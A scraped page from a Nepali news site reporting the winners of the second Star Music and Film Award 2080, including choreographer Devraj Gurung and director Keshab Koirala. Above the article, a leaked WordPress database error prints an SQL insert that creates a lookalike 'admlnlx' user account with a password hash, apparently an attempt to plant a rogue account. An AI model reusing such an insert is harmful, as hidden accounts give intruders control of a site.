WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BC4lo5fCYxXtXAxnm/nluTZZ8CkC8..', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 07:04:30', '', 'admlnlx', 'admlnlx')

उत्कृष्ट निर्देशक अवार्ड केशब कोइराला र कोरियोग्राफर अवार्ड देवराज गुरुङ लाई – Gaule Khabar

उत्कृष्ट निर्देशक अवार्ड केशब कोइराला र कोरियोग्राफर अवार्ड देवराज गुरुङ लाई

उत्कृष्ट निर्देशक अवार्ड केशब कोइराला र कोरियोग्राफर अवार्ड देवराज गुरुङ लाई

काठमाडौं । दोश्रो स्टार म्युजिक एण्ड फिल्म अवार्ड २०८० मा उत्कृष्ट म्युजिक भिडियो कोरियोग्राफरको अवार्ड नृत्य निर्देशक देवराज गुरुङले प्राप्त गरेको छ ।

असार २ गते शनिबार काठमाण्डौं स्थित चलचित्र बिकाश बोर्डको सभा हलमा पुर्व खेलकुद मन्त्री तथा संघिय सांसद माननीय हित बहादुर तामाङको प्रमुख आतिथ्यमा सम्पन्न कार्यक्रममा विविध विधाका झण्डै ५ दर्जन भन्दा बढी कलाकारहरुले अवार्ड प्राप्त गरेको थियो ।

रन्जित लामाको स्वरमा रहेको खोली बगर बोलको गितबाट गुरुङले सो अवार्ड प्राप्त गरेको हो । बिगत एक दशक लामो समय देखि नृत्य निर्देशक तथा मोडलिङ क्षेत्रमा कार्यरत गुरुङ पछिल्लो समय सांस्कृतिक लोक नाचहरुको संरक्षण तथा प्रवद्र्घनका निमित्त लागि परिरहेका छन् । सोही विधामा उत्कृष्ट म्युजिक भिडियो कोरियोग्राफर जुरि तर्फ भने चुडामणी फुयालले अवार्ड प्राप्त गरेको हो ।

बिरिसु मिडियाका अध्यक्ष बिबेक लोप्चनको सभापतित्वमा सम्पन्न कार्यक्रममा उत्कृष्ट म्युजिक भिडियो निर्देशक अवार्ड केशब कोइराला र उत्कृष्ट मोडल अवार्ड छिरिङ लामाले अवार्ड प्राप्त गरेको हो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका